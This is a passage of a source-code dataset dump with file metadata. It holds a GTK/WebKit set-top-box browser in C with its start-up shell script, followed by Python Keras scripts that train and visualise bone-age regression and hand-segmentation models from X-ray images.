event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (event->keyval == GDK_BackSpace)\n goBack();\n }\n return false;\n}\n\n\nstatic gboolean expose_event(GtkWidget * widget, GdkEventExpose * event)\n{\n printf(\"%s\\n\", __func__);\n cairo_t *cr;\n\n cr = gdk_cairo_create(GDK_DRAWABLE(widget->window));\n gdk_cairo_region(cr, event->region);\n cairo_clip(cr);\n\n cairo_set_operator(cr, CAIRO_OPERATOR_SOURCE);\n cairo_set_source_rgba(cr, 0.5, 0.5, 0.5, 1.0);\n cairo_paint(cr);\n cairo_destroy(cr);\n return false;\n}\n\nstatic GtkWidget*\ncreate_window ()\n{\n g_window = gtk_window_new (GTK_WINDOW_TOPLEVEL);\n gtk_window_set_default_size (GTK_WINDOW (g_window), g_framebuffer_width, g_framebuffer_height);\n gtk_widget_set_name (g_window, \"eve-browser\");\n gtk_window_set_decorated(GTK_WINDOW(g_window), false);\n\n GdkScreen *screen = gtk_widget_get_screen(g_window);\n gtk_widget_set_colormap(g_window, gdk_screen_get_rgba_colormap(screen));\n gtk_widget_set_app_paintable(g_window, true);\n gtk_widget_realize(g_window);\n gdk_window_set_back_pixmap(g_window->window, NULL, false);\n\n g_signal_connect(g_window, \"expose-event\", G_CALLBACK(expose_event), g_window);\n\n g_signal_connect (g_window, \"destroy\", G_CALLBACK (destroy_cb), NULL);\n g_signal_connect (g_window, \"key-press-event\", G_CALLBACK (on_key_press), NULL);\n g_signal_connect (g_window, \"key-release-event\", G_CALLBACK (on_key_press), NULL);\n\n //g_signal_connect (g_window, \"screen-changed\", G_CALLBACK (screen_changed), NULL);\n return g_window;\n}\n\n////////////////////////////////////////////////////////////////////////////////////////////////////\n\n#define KEY_TYPE_PRESS 0\n#define KEY_TYPE_RELEASE 1\n\nvoid keyPress(char * key, int type)\n{\n printf(\"%s %s\\n\", __func__, key);\n gboolean rtv;\n/*\n GdkEventType type;\n 
GdkWindow *window;\n gint8 send_event;\n guint32 time;\n guint state;\n guint keyval;\n gint length;\n gchar *string;\n guint16 hardware_keycode;\n guint8 group;\n guint is_modifier : 1;\n*/\n\n //GdkEventKey * event = (GdkEventKey*)malloc(sizeof(GdkEventKey));\n GdkEvent* event = gdk_event_new(GDK_KEY_PRESS); \n\n\n if(type == KEY_TYPE_PRESS)\n ((GdkEventKey*)event)->type = GDK_KEY_PRESS; \n else if(type == KEY_TYPE_RELEASE) \n ((GdkEventKey*)event)->type = GDK_KEY_RELEASE;\n else\n return;\n \n ((GdkEventKey*)event)->window = g_window->window; \n\n ((GdkEventKey*)event)->send_event = 1;\n ((GdkEventKey*)event)->time = GDK_CURRENT_TIME;\n ((GdkEventKey*)event)->state = 0;\n \n ((GdkEventKey*)event)->keyval = 0;\n //((GdkEventKey*)event)->length = 1;\n \n if (!strcmp(key, \"red\"))\n ((GdkEventKey*)event)->keyval = GDK_F5; //'t';\n else if(!strcmp(key, \"green\"))\n ((GdkEventKey*)event)->keyval = GDK_F6; //'u';\n else if(!strcmp(key, \"yellow\"))\n ((GdkEventKey*)event)->keyval = GDK_F7; //'v';\n else if(!strcmp(key, \"blue\"))\n ((GdkEventKey*)event)->keyval = GDK_F8; //'w';\n\n else if(!strcmp(key, \"up\"))\n ((GdkEventKey*)event)->keyval = GDK_Up;\n else if(!strcmp(key, \"down\"))\n ((GdkEventKey*)event)->keyval = GDK_Down;\n else if(!strcmp(key, \"left\"))\n ((GdkEventKey*)event)->keyval = GDK_Left;\n else if(!strcmp(key, \"right\"))\n ((GdkEventKey*)event)->keyval = GDK_Right;\n \n else if(!strcmp(key, \"ok\"))\n ((GdkEventKey*)event)->keyval = GDK_Return;\n else if(!strcmp(key, \"play\"))\n ((GdkEventKey*)event)->keyval = 'P';\n else if(!strcmp(key, \"pause\"))\n ((GdkEventKey*)event)->keyval = 'P'; // PAUSE IS Q but it seems that P is Toggle PlayPause\n else if(!strcmp(key, \"stop\"))\n ((GdkEventKey*)event)->keyval = 'S';\n else if(!strcmp(key, \"rewind\"))\n ((GdkEventKey*)event)->keyval = 'R';\n else if(!strcmp(key, \"fastforward\"))\n ((GdkEventKey*)event)->keyval = 'F';\n\n\n else {\n GdkKeymapKey* keys; \n gint n_keys; \n gdk_keymap_get_entries_for_keyval(gdk_keymap_get_default(), ((GdkEventKey*)event)->keyval, &keys, &n_keys); \n\n ((GdkEventKey*)event)->hardware_keycode = keys[0].keycode; \n }\n\n ((GdkEventKey*)event)->group = 0;\n ((GdkEventKey*)event)->is_modifier = 0;\n \n \n if(((GdkEventKey*)event)->keyval != 0) {\n //if(type == KEY_TYPE_PRESS) {\n //gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n gdk_event_put(event); \n //}\n //else if(type == KEY_TYPE_RELEASE) \n // gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-release-event\", event, &rtv);\n return;\n }\n\n //event->state |= GDK_MOD1_MASK;\n return;\n}\n\n\n\nvoid loadEveBrowser()\n{\n int argc = 0;\n printf(\"%s:%d\\n\", __func__, __LINE__);\n gtk_init_check(&argc, NULL);\n if (!g_thread_supported ())\n g_thread_init (NULL);\n \n printf(\"%s:%d\\n\", __func__, __LINE__);\n\n GtkWidget* fixed = gtk_fixed_new();\n g_vbox = gtk_vbox_new (FALSE, 0);\n gtk_box_pack_start (GTK_BOX (g_vbox), create_toolbar (), FALSE, FALSE, 0);\n gtk_box_pack_start (GTK_BOX (g_vbox), GTK_WIDGET (create_browser ()), TRUE, TRUE, 0);\n gtk_box_pack_start (GTK_BOX (g_vbox), create_statusbar (), FALSE, FALSE, 0);\n \n g_window = create_window ();\n \n gtk_fixed_put(GTK_FIXED(fixed), g_vbox, 0, 0);\n gtk_widget_set_size_request(g_vbox, g_framebuffer_width, g_framebuffer_height);\n \n GtkWidget* statusLabel = gtk_label_new (\"Status\");\n gtk_fixed_put(GTK_FIXED(fixed), statusLabel, g_framebuffer_width - 200, 0);\n gtk_widget_set_size_request(statusLabel, 200, 100);\n \n gtk_container_add 
(GTK_CONTAINER (g_window), fixed);\n}\n\nvoid unloadEveBrowser()\n{\n gtk_main_quit();\n}\n\nint main (int argc, char* argv[]);\n\n\nvoid *GtkMain(void * argument)\n{\n printf(\"%s:%d\\n\", __func__, __LINE__);\n\n int argc = 0;\n char**argv = NULL;\n\n unsigned char haveUrl = 0;\n int argCount = 0;\n\n gtk_init (&argc, &argv);\n if (!g_thread_supported ())\n g_thread_init (NULL);\n\n GtkWidget* fixed = gtk_fixed_new();\n //screen_changed(fixed, NULL, NULL);\n g_vbox = gtk_vbox_new (FALSE, 0);\n gtk_box_pack_start (GTK_BOX (g_vbox), create_toolbar (), FALSE, FALSE, 0);\n gtk_box_pack_start (GTK_BOX (g_vbox), GTK_WIDGET (create_browser ()), TRUE, TRUE, 0);\n gtk_box_pack_start (GTK_BOX (g_vbox), create_statusbar (), FALSE, FALSE, 0);\n\n g_window = create_window ();\n\n gtk_fixed_put(GTK_FIXED(fixed), g_vbox, 0, 0);\n gtk_widget_set_size_request(g_vbox, g_framebuffer_width, g_framebuffer_height);\n\n GtkWidget* statusLabel = gtk_label_new (\"Status\");\n gtk_fixed_put(GTK_FIXED(fixed), statusLabel, g_framebuffer_width - 200, 0);\n gtk_widget_set_size_request(statusLabel, 200, 100);\n\n gtk_container_add (GTK_CONTAINER (g_window), fixed);\n\n webkit_web_view_load_uri (g_web_view, g_url);\n\n gtk_widget_grab_focus (GTK_WIDGET (g_web_view));\n gtk_widget_show_all (g_window);\n\n toogleMode();\n\n g_default_scale = g_framebuffer_width / 1280.0f;\n handleZoomLock(0);\n\n g_Callback(1);\n\n gtk_main ();\n return NULL;\n}\n\nvoid show()\n{\n\n\n pthread_create(&g_BrowserMain, NULL, GtkMain, NULL);\n}\n\nvoid hide()\n{\n printf(\"%s:%d\\n\", __func__, __LINE__);\n gtk_widget_hide_all (g_window);\n}\n\n\n\n\n\nint\nmain (int argc, char* argv[])\n{\n pthread_create(&g_BrowserMain, NULL, GtkMain, NULL);\n while(1);\n\n return 0;\n}\n#endif\n\n" }, { "alpha_fraction": 0.64213627576828, "alphanum_fraction": 0.6459209322929382, "avg_line_length": 28, "blob_id": "acc800503e3a6ce54b14c870577c96b70a995da9", "content_id": "d3c11090b8ec6feb24b1de19aa3cec99f8d5be5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2378, "license_type": "no_license", "max_line_length": 97, "num_lines": 82, "path": "/js_debug.c", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <string.h>\n\n#include <JavaScriptCore/JavaScript.h>\n\nint JSValueToString(JSContextRef ctx, JSValueRef argument, JSValueRef *exception, char ** string)\n{\n JSType type = JSValueGetType(ctx, argument); \n if(type != kJSTypeString)\n return -1;\n\n JSStringRef s;\n s = JSValueToStringCopy(ctx, argument, exception);\n\n unsigned int len = JSStringGetLength(s);\n *string = (char * )malloc(len+1);\n JSStringGetUTF8CString(s, *string, len+1);\n\n JSStringRelease(s);\n return strlen(*string);\n}\n\n\nvoid printJSStringRef(JSStringRef string)\n{\n unsigned int len = JSStringGetLength(string);\n char * buffer = (char * )malloc(len+1);\n JSStringGetUTF8CString(string, buffer, len+1);\n printf(\"%s\\n\", buffer);\n free(buffer);\n}\n\nvoid printJSObjectRef(JSContextRef ctx, JSObjectRef argument)\n{\n\n JSPropertyNameArrayRef names = JSObjectCopyPropertyNames(ctx, argument);\n unsigned int propertySize = JSPropertyNameArrayGetCount(names);\n printf(\"%s > (propertySize=%d)\\n\", __func__, propertySize);\n for(unsigned int i = 0; i < propertySize; i++)\n {\n JSStringRef name = JSPropertyNameArrayGetNameAtIndex(names, i);\n printf(\"[%2d] \", i); printJSStringRef(name); printf(\"\\n\");\n }\n printf(\"%s < \\n\", 
__func__);\n}\n\nvoid printJSValueRef(JSContextRef ctx, JSValueRef argument, JSValueRef *exception)\n{\n printf(\"%s > \\n\", __func__);\n JSType type = JSValueGetType(ctx, argument);\n switch(type)\n {\n case kJSTypeUndefined: printf(\"kJSTypeUndefined\\n\"); break;\n case kJSTypeNull: printf(\"kJSTypeNull\\n\"); break;\n case kJSTypeBoolean: \n printf(\"kJSTypeBoolean\\n\"); \n printf(\"%s\\n\", JSValueToBoolean(ctx, argument)?\"True\":\"False\"); \n break;\n case kJSTypeNumber: \n printf(\"kJSTypeNumber\\n\"); \n printf(\"%f\\n\", JSValueToNumber(ctx, argument, exception)); \n break;\n\n case kJSTypeString: \n printf(\"kJSTypeString\\n\"); \n JSStringRef s;\n s = JSValueToStringCopy(ctx, argument, exception);\n printJSStringRef(s); \n JSStringRelease(s);\n break;\n\n case kJSTypeObject: \n printf(\"kJSTypeObject\\n\"); \n JSObjectRef o = JSValueToObject(ctx, argument, exception);\n printJSObjectRef(ctx, o); \n break;\n\n }\n printf(\"%s < \\n\", __func__);\n}\n" }, { "alpha_fraction": 0.678073525428772, "alphanum_fraction": 0.7224334478378296, "avg_line_length": 30.559999465942383, "blob_id": "29c0f823fb98587372bed75b2bdb859f7d0ba29b", "content_id": "da69738a391c42c2b0c17f10a641d66c949dd7f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 789, "license_type": "no_license", "max_line_length": 70, "num_lines": 25, "path": "/start.sh", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "killall evremote2\nevremote2 -r /root/dfb/share/evremote2/ufs912_hbbtv.rc &\n\nexport LD_LIBRARY_PATH=/root/dfb/lib:$LD_LIBRARY_PATH\nln -s /root/dfb/share/directfb-1.4.3 /usr/share/directfb-1.4.3\n#ln -s /root/dfb/share/directfb-examples/ /usr/share/directfb-examples\nln -s /root/dfb/share/gtk-2.0/ /usr/share/gtk-2.0\nln -s /root/dfb/lib/directfb-1.4-0/ /usr/lib/directfb-1.4-0\nln -s /root/dfb/lib/gtk-2.0/ /usr/lib/gtk-2.0\nln -s /root/dfb/lib/pango/ /usr/lib/pango\n\nmkdir -p /etc/pango/\n#/root/dfb/bin/pango-querymodules > '/etc/pango/pango.modules'\ncp /root/dfb/share/pango/pango.modules /etc/pango/\ncp -r /root/dfb/share/gtk-2.0 /etc/\n\n\nexport DFBARGS=\"pixelformat=ARGB,no-cursor,bg-none\"\nexport GTK_IM_MODULE=multipress\n\n\nexec \"/root/dfb/bin/$1\" $2 $3 $4 $5\n\nkillall evremote2\nevremote2 &\n" } ]
13
ganaiemudasir05/bone-age-assessment
https://github.com/ganaiemudasir05/bone-age-assessment
a3a3581f560ace97b35e288b46f390ee1b2722f9
a89734e38c6576309ccfcf2d2be108b13274f6c3
0c32d56a1d8cca0b8734c0c15133791b08d21a4f
refs/heads/master
2023-03-16T06:53:50.486717
2018-11-28T11:36:06
2018-11-28T11:36:06
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6107441782951355, "alphanum_fraction": 0.6226332187652588, "avg_line_length": 37.49152374267578, "blob_id": "2f4e6ea8e8175bfde4d0224b4e8f3506492a08bd", "content_id": "2cc33dda65777c9b91e43b18ce69bc391192d310", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4542, "license_type": "no_license", "max_line_length": 122, "num_lines": 118, "path": "/vallina_transfer_learning/train.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import keras\nimport os\nimport argparse\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\n\nfrom keras.applications.xception import Xception\n\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras.models import Model\nfrom keras import optimizers\nfrom pprint import pprint\nfrom tqdm import tqdm\n\nfrom config import *\nfrom utils import *\nfrom utils_metric import regression_metric\nfrom utils import _pprint\n\n\ndef _build_regressor(img_size=299, learning_rate=1E-4):\n input_shape = (img_size, img_size, 3)\n base_model = Xception(input_shape=input_shape, weights=\"imagenet\", include_top=False)\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n predictions = Dense(1, activation=keras.activations.relu)(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n optimizer = optimizers.RMSprop(lr=learning_rate, decay=0.95)\n\n model.compile(optimizer=optimizer, loss=\"mean_squared_error\")\n model.summary(print_fn=_pprint)\n return model\n\n\ndef train(n_epoch, img_size=299, sex=0, batch_size=16, learning_rate=1E-4):\n assert sex in [0, 1, 2]\n model = _build_regressor(img_size, learning_rate)\n\n best_mae = np.inf\n\n data_ids = load_sex_ids(sex)\n\n for epoch in tqdm(range(n_epoch)):\n print \"[x] epoch {} -------------------------------------------\".format(epoch)\n for mini_batch in range(len(data_ids)//batch_size):\n batch_x, batch_y = load_data(sex=sex, img_size=img_size, batch_size=batch_size, augment_times=7)\n loss = model.train_on_batch(x=batch_x, y=batch_y)\n if mini_batch % 50 == 0:\n print \"--epoch {}, mini_batch {}, loss {}\".format(epoch, mini_batch, loss)\n\n # test\n print \"[x] test in epoch {}\".format(epoch)\n losses = 0.0\n for mini_batch in range(int(0.2*len(data_ids)//batch_size)):\n batch_x, batch_y = load_data(sex=sex, img_size=img_size, batch_size=batch_size, augment_times=0)\n loss = model.test_on_batch(batch_x, batch_y)\n losses += loss\n losses = losses/(int(0.3*len(data_ids)//batch_size))\n print \"== epoch {}, test loss {}\".format(epoch, losses)\n\n # test and metric\n print \"[x] predict in epoch {}\".format(epoch)\n y_true = []\n y_pred = []\n for mini_batch in range(int(0.2*len(data_ids)//batch_size)):\n batch_x, batch_y = load_data(sex=sex, img_size=img_size, batch_size=batch_size, augment_times=0)\n pred_y = model.predict_on_batch(batch_x)\n for i in range(batch_size):\n y_true.append(batch_y[i]*SCALE)\n y_pred.append(pred_y[i]*SCALE)\n\n evs, mae, mse, meae, r2s, ccc = regression_metric(np.array(y_true), np.array(y_pred))\n save_obj({\"evs\": evs, \"mae\": mae, \"mse\": mse, \"meae\": meae, \"r2s\": r2s, \"ccc\": ccc, \"loss\": losses},\n name=metric_out_dir+\"/epoch_{}.pkl\".format(epoch))\n\n if mae < best_mae:\n best_mae = mae\n model.save_weights(model_out_dir + \"/model.h5\")\n\n print \"[x] epoch {}, evs {}, mae {}, mse {}, meae {}, r2s {}, ccc {}\".format(epoch, evs, mae, mse, meae, r2s, ccc)\n\n\nif __name__ == \"__main__\":\n parser = 
argparse.ArgumentParser()\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"regression\")\n parser.add_argument('--img_size', type=int, help=\"image size\", default=192)\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=2)\n parser.add_argument('--sex', type=int, help=\"1 for male, 2 for female\", default=1)\n parser.add_argument('--gpu_id', type=int, help=\"number of GPU\", default=0)\n parser.add_argument('--epoch', type=int, default=200)\n FLAGS = parser.parse_args()\n\n pprint(FLAGS)\n\n exp_name = FLAGS.exp\n img_size = FLAGS.img_size\n batch_size = FLAGS.batch_size\n sex = FLAGS.sex\n gpu_id = FLAGS.gpu_id\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n metric_out_dir = \"E{}_S{}_IMG_{}/metric\".format(exp_name, sex, img_size)\n model_out_dir = \"E{}_S{}_IMG_{}/model\".format(exp_name, sex, img_size)\n if not os.path.isdir(metric_out_dir):\n os.makedirs(metric_out_dir)\n if not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\n\n # training\n train(n_epoch=FLAGS.epoch, img_size=img_size, sex=sex, batch_size=batch_size)\n" }, { "alpha_fraction": 0.6582733988761902, "alphanum_fraction": 0.6714628338813782, "avg_line_length": 41.11111068725586, "blob_id": "2936ff82c9df8331e9f185a07e3122d1555e00d9", "content_id": "3080788be990752b58e0940146e172f71a2225b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4170, "license_type": "no_license", "max_line_length": 118, "num_lines": 99, "path": "/al_segmentation/step7_cam_visualize_all.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import cv2\nimport argparse\nimport numpy as np\nimport os\nimport time\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input as inception_v3_input\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_resnet_v2 import preprocess_input as inception_resnet_input\nfrom keras.applications.xception import preprocess_input as xception_input\n\n\nfrom utils_data import load_obj\nfrom step4_regression_with_cam import _build_regresser\nfrom step6_cam import getCAM\nfrom config import RSNA_TRAIN_CSV, RSNA_SEG_ENHANCE\n\nfrom glob import glob\nfrom tqdm import tqdm\n\n\ndef load_img(data_id=None, img_size=256, preprocess_fn=xception_input):\n data_dir = RSNA_SEG_ENHANCE\n img_file_name = data_dir + \"/{}_seg.png\".format(data_id)\n img = cv2.imread(img_file_name, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n ori_img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n img = np.array(img, dtype=np.float32)\n img = preprocess_fn(img)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n int_image = np.array(ori_img, dtype=np.uint8)\n return img, int_image\n\n\ndef get_ba_by_id(img_id):\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n boneages = dataset_df[dataset_df.id==img_id].boneage\n boneage = boneages[boneages.index[0]]\n return boneage\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=32)\n parser.add_argument('--model_name', type=str, help=\"model name: inception_v3 ....\", 
default=\"inception_v3\")\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"cam\")\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n parser.add_argument('--augment', type=str, help=\"augment data\", default=\"false\")\n parser.add_argument('--fine_tune', type=str, help=\"fine tune pretrained layer\", default=\"3\")\n parser.add_argument('--num_gpu', type=int, default=1)\n FLAGS = parser.parse_args()\n\n num_gpu = FLAGS.num_gpu\n batch_size = FLAGS.batch_size * num_gpu\n model_name = FLAGS.model_name\n exp_name = FLAGS.exp\n sex = FLAGS.sex\n augment_data = True if FLAGS.augment == \"true\" else False\n fine_tune = FLAGS.fine_tune\n\n metric_out_dir = \"E{}_M{}_S{}_A{}_F{}/metric\".format(exp_name, model_name, sex, augment_data, fine_tune)\n model_out_dir = \"E{}_M{}_S{}_A{}_F{}/model\".format(exp_name, model_name, sex, augment_data, fine_tune)\n cam_out_dir = \"E{}_M{}_S{}_A{}_F{}/cam_visualize_all\".format(exp_name, model_name, sex, augment_data, fine_tune)\n cam_out_dir2 = \"E{}_M{}_S{}_A{}_F{}/cam_visualize_all2\".format(exp_name, model_name, sex, augment_data, fine_tune)\n\n if not os.path.isdir(cam_out_dir):\n os.makedirs(cam_out_dir)\n if not os.path.isdir(cam_out_dir2):\n os.makedirs(cam_out_dir2)\n\n if model_name == \"inception_v3\":\n preprocess_fn = inception_v3_input\n elif model_name == \"inception_resnet_v2\":\n preprocess_fn = inception_resnet_input\n elif model_name == \"xception\":\n preprocess_fn = xception_input\n else:\n raise ValueError(\"Not a supported model name\")\n\n print \"[x] load saved model file\"\n weights_history = load_obj(model_out_dir + \"/weights_history.pkl\")\n model, input_shape, base_model = _build_regresser(model_name, weights=\"imagenet\", num_gpu=1, fine_tune=fine_tune)\n base_model.load_weights(filepath=model_out_dir + \"/base_model.h5\")\n\n imgs = glob(RSNA_SEG_ENHANCE+\"/*.*\")\n for img in tqdm(imgs):\n img_id = int(img[img.rfind(\"/\")+1:img.rfind(\"_\")])\n bone_age = get_ba_by_id(img_id)\n img, int_img = load_img(img_id, img_size=299, preprocess_fn=preprocess_fn)\n out = getCAM(image=int_img,\n feature_maps=base_model.predict(np.expand_dims(img, axis=0))[0],\n weights=weights_history[-1])\n\n cv2.imwrite(cam_out_dir+\"/{}_{}.png\".format(bone_age, img_id), out)\n cv2.imwrite(cam_out_dir2+\"/{}.png\".format(img_id), out)\n\n" }, { "alpha_fraction": 0.6272531747817993, "alphanum_fraction": 0.6437903046607971, "avg_line_length": 39.57718276977539, "blob_id": "2ea67957910057044295a35cc60425cc6aee3c49", "content_id": "918e82db6aeababfe31d60c9c1838909534f8d70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6047, "license_type": "no_license", "max_line_length": 118, "num_lines": 149, "path": "/vallina_transfer_learning/train2.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nimport pandas as pd\nimport os\nimport argparse\nimport pprint\nimport tensorflow as tf\n\nfrom glob import glob\nfrom tqdm import tqdm\nfrom config import *\nfrom utils_data_gen import build_data_generator\nfrom utils import save_obj, _pprint, LossHistory\n\n# import keras\nimport keras.backend as K\nfrom keras.applications.xception import Xception\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.layers import GlobalAveragePooling2D, Dense, Dropout\nfrom keras.models import Model\nfrom 
keras.backend.tensorflow_backend import set_session\nfrom keras.metrics import mean_absolute_error\nfrom keras import optimizers\n\n\n\nbone_age_std = 0\nbone_age_mean = 0\n\n\ndef ccc(y_true, y_pred):\n y_true = y_true * bone_age_std + bone_age_mean\n y_pred = y_pred * bone_age_std + bone_age_mean\n\n x_mean = K.mean(y_true, axis=-1)\n y_mean = K.mean(y_pred, axis=-1)\n return 2 * (y_true -x_mean) * (y_pred - y_mean) / \\\n (K.pow(y_true - x_mean, 2) + K.pow(y_pred - y_mean, 2) + K.pow(x_mean - y_mean, 2))\n\n\ndef mae_months(in_gt, in_pred):\n return mean_absolute_error(bone_age_std * in_gt, bone_age_std * in_pred)\n\n\ndef build_model(flags, model_file):\n if flags.model_name == \"inception_v3\":\n base_model = InceptionV3(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n elif flags.model_name == \"inception_resnet_v2\":\n base_model = InceptionResNetV2(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n elif flags.model_name == \"xception\":\n base_model = Xception(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n else:\n raise NotImplementedError(\"Not a supported model: {}\".format(flags.model_name))\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n x = Dropout(0.5)(x)\n x = Dense(1024, activation='tanh')(x)\n x = Dropout(0.25)(x)\n x = Dense(1, activation='linear')(x)\n\n model = Model(inputs=base_model.input, outputs=x)\n\n if os.path.isfile(model_file):\n print \"[x] loading model file {}\".format(model_file)\n model.load_weights(model_file)\n\n optimizer = optimizers.Adam(lr=0.0001)\n model.compile(optimizer=optimizer, loss='mse', metrics=[mae_months, ccc])\n\n model.summary(print_fn=_pprint)\n return model\n\n\ndef build_callbacks(model_file_path):\n from keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\n checkpoint = ModelCheckpoint(model_file_path, monitor='val_loss', verbose=1,\n save_best_only=True, mode='min', save_weights_only=True)\n reduceLROnPlat = ReduceLROnPlateau(monitor='val_loss', factor=0.8, patience=10, verbose=1, mode='auto',\n epsilon=0.0001, cooldown=5, min_lr=0.000001)\n early = EarlyStopping(monitor=\"val_loss\", mode=\"min\", patience=5)\n loss_callback = LossHistory()\n callbacks_list = [checkpoint, early, reduceLROnPlat, loss_callback]\n return callbacks_list\n\n\ndef train(flags, output_path):\n print \"[x] loading data\"\n train_gen, valid_gen, bone_mean, bone_std, test_X, test_Y = \\\n build_data_generator(model_name=flags.model_name, sex=flags.sex, img_path=flags.image_path,\n num_per_category=flags.n_samples, img_size=flags.image_size, batch_size=flags.batch_size)\n global bone_age_std\n bone_age_std = bone_std\n global bone_age_mean\n bone_age_mean = bone_mean\n\n print \"[x] building model\"\n bone_age_model = build_model(flags, model_file=output_path + \"/weights.h5\")\n print \"[x] building callbacks\"\n callbacks = build_callbacks(output_path + \"/weights.h5\")\n print \"[x] fit\"\n\n hist = bone_age_model.fit_generator(train_gen,\n validation_data=(test_X, test_Y),\n epochs=flags.n_epochs,\n callbacks=callbacks,\n workers=4,\n steps_per_epoch=5000)\n save_obj(hist.history, output_path + \"/{}_history.pkl\".format(flags.fine_tune))\n\n\nif __name__ == \"__main__\":\n # python step1_fine_tune.py --batch_size=16 --model_name=inception_v3 --exp=ENH --sex=1 --fine_tune=-1\n # --gpu_id=0 --image_path=../data/segmented_enhance --image_size=384 --n_epoch=500 --n_samples=500\n\n 
parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=4)\n parser.add_argument('--model_name', type=str, help=\"model name: inception_v3 ....\", default=\"inception_v3\")\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"ENH\")\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=2)\n parser.add_argument('--fine_tune', type=int, help=\"fine tune pretrained layer\", default=0)\n parser.add_argument('--gpu_id', type=int, default=0)\n parser.add_argument('--image_path', type=str, default=RSNA_TRAIN_DATA)\n parser.add_argument('--image_size', type=int, default=256)\n parser.add_argument('--n_epochs', type=int, default=500)\n parser.add_argument('--n_samples', type=int, default=500)\n FLAGS = parser.parse_args()\n\n pprint.pprint(FLAGS)\n\n print \"[x] building models on GPU {}\".format(FLAGS.gpu_id)\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(FLAGS.gpu_id)\n\n config = tf.ConfigProto()\n # config.gpu_options.allow_growth = True\n config.gpu_options.per_process_gpu_memory_fraction = 0.95\n set_session(tf.Session(config=config))\n\n output_path = \"E{}_M{}_S{}_I{}\".format(FLAGS.exp, FLAGS.model_name, FLAGS.sex, FLAGS.image_size)\n\n if not os.path.isdir(output_path):\n os.makedirs(output_path)\n\n train(FLAGS, output_path)\n" }, { "alpha_fraction": 0.6445947289466858, "alphanum_fraction": 0.6624608635902405, "avg_line_length": 46.63461685180664, "blob_id": "8f496c5eb790b6772b3ed2297347f393cd2badaf", "content_id": "ad41820af4e47d5a9d80a7304c0c0b1abf410e3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9907, "license_type": "no_license", "max_line_length": 130, "num_lines": 208, "path": "/al_segmentation/step3_gen_segmentation_result.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\n\nfrom tqdm import tqdm\nfrom glob import glob\n\nimport utils_data\n\nfrom tf_model_unet import unet\nfrom tf_ops import dice_coef_loss, pixelwise_cross_entropy\nfrom config import *\nfrom utils_metrics import threshold_by_otsu\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', type=int, help=\"training batch size\", default=4)\nparser.add_argument('--dice', type=float, help=\"dice coefficient loss ratio\", default=1.0)\nparser.add_argument('--pixel', type=float, help=\"pixelwise cross entropy loss ratio\", default=1.0)\nparser.add_argument('--gpu', type=int, help=\"GPU number\", default=0)\nparser.add_argument('--exp', type=str, help=\"experiment name\", default=\"interactive_segmentation\")\nFLAGS = parser.parse_args()\n\nbatch_size = FLAGS.batch_size\ndice_ratio = FLAGS.dice\npixel_ratio = 